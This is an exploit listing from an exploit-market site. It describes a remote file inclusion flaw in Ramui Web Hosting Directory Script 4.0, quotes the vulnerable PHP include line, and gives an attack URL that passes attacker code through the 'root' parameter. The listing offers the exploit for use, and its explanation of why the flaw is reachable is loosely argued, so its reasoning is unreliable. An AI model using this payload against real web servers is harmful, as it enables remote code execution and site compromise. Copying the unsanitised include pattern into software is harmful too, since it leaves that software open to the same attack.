[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Ramui Web Hosting Directory Script 4.0 - Remote File Inclusion

Author
bd0rk
Risk
[
Security Risk High
]
0day-ID
0day-ID-24879
Category
web applications
Date add
28-01-2016
Platform
php
# Title: Ramui web hosting directory script 4.0 Remote File Include Vulnerability
# Author: bd0rk
# Twitter: twitter.com/bd0rk
# Vendor: http://www.ramui.com
# Download: http://ramui.com/directory-script/download-v4.html
 
Proof-of-Concept:
/gb/include/connection.php lines 6-13 in php-sourcecode
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class connection
{
protected $site;
public $error=false;
protected $admin=false;
function __construct($root)
{
        include $root."database/config.php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
The $root-parameter is a __construct.
But no value was passed to him.
Therefore, nothing can be checked before include in line 13.
So an attacker can execute malicious shellcode about it.
In this case, the __construct is meaningless.
 
 
[+]Exploit: http://[server]/path/gb/include/connection.php?root=[YourShellcode]
 
 
~~Everything revolves. Even the planet. :)~~
***Greetz to ALL my followers on Twitter!***
 
/bd0rk

#  0day.today [2024-11-15]  #